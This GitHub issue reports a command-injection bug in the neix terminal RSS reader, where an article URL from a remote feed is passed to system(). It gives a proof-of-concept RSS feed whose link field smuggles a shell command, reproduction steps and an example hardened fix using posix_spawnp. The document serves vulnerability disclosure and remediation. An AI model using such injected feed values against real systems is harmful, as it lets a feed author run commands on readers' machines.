qw3rtty / neix

neix - a RSS/Atom feed reader for your terminal.
GNU General Public License v3.0

[BUG] Application::openArticleLink: Unsafe use of system() function may lead to command injection when opening an article in web browser #30

Open bcoles opened 2 years ago

bcoles commented 2 years ago

Describe the bug

When opening an RSS entry link in a browser (i.e., pressing o), the Application::openArticleLink() function calls system(openCmd.c_str()); to open the URL in a web browser.

openCmd is constructed in part from the article URL (article->url) from the remote feed. No validation is performed on article->url, allowing injection of arbitrary commands.

https://github.com/tomschwarz/neix/blob/9924d7d52d67a3125882e3905497159a6af0b3c0/src/application/Application.cpp#L526-L545

The following simple proof of concept demonstrates this issue. Also note that the command injection is effectively invisible as the link is not printed anywhere in the user interface. Upon pressing o, the link is opened immediately and without warning, resulting in execution of the injected command (id >/tmp/pwned).

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>test</title>
  <description>test</description>
  <language>en-us</language>
  <pubDate>Mon, 06 Dec 2021 16:27:50 GMT</pubDate>
  <generator></generator>
  <item>
    <title>hello</title>
    <link>http://example.com/ & id >/tmp/pwned & echo </link>
    <description>hello friends!</description>
    <pubDate>Wed, 27 Aug 2008 00:00:00 GMT</pubDate>
  </item>
  </channel>
</rss>

To Reproduce

Steps to reproduce the behavior:

  1. Host the above XML on a web server somewhere.
  2. Add a link to the above hosted XML file to feeds.conf - for example: [rss] rss=http://your.web.server.local/rss
  3. Run neix: ./bin/neix -f /path/to/your/feeds.conf
  4. If you have more than one feed, arrow down to the "rss" feed
  5. Press o
  6. Check cat /tmp/pwned for output of id

Expected behavior

The article URL should be opened in a web browser without also executing arbitrary system commands specified in the feed article URL.
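Added example, not code from the neix project: one way to close this class of bug is to never hand the feed-supplied URL to a shell at all. The helper below validates that the article link is an http(s) URL made only of RFC 3986 characters (the proof-of-concept link above fails on its spaces and `>`), then starts the browser with the URL as a single argv entry via posix_spawnp, so `&`, `;` or `>` in a link are plain bytes rather than shell syntax. It assumes a POSIX host and a fixed browser program name (`xdg-open` here, an assumption).

```cpp
// Hardened replacement for a system()-based "open in browser" call.
// Added example, not neix's own code. Assumes POSIX and that the browser
// is a fixed program name (default "xdg-open", an assumption).
#include <cctype>
#include <string>
#include <vector>
#include <spawn.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

// Accept only http(s) URLs built from characters RFC 3986 permits.
// Whitespace, quotes, '>' and control bytes are rejected, so a link such as
// "http://example.com/ & id >/tmp/pwned & echo " never reaches the browser.
bool isSafeArticleUrl(const std::string &url) {
    if (url.rfind("http://", 0) != 0 && url.rfind("https://", 0) != 0)
        return false;
    const std::string allowedPunct = "-._~:/?#[]@!$&'()*+,;=%";
    for (unsigned char c : url) {
        if (std::isalnum(c) || allowedPunct.find(c) != std::string::npos)
            continue;
        return false;  // anything else (space, '>', '"', '\n', ...) is refused
    }
    return true;
}

// Launch the browser without a shell: the URL is one argv element, so shell
// metacharacters in it are never interpreted. Returns true on a zero exit.
bool openArticleLink(const std::string &url,
                     const std::string &browser = "xdg-open") {
    if (!isSafeArticleUrl(url))
        return false;
    std::vector<char *> argv = {const_cast<char *>(browser.c_str()),
                                const_cast<char *>(url.c_str()), nullptr};
    pid_t pid = 0;
    if (posix_spawnp(&pid, browser.c_str(), nullptr, nullptr, argv.data(),
                     environ) != 0)
        return false;
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return false;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

Validation alone is not the fix; the point is that the URL is passed as an argument, not as text for /bin/sh to parse.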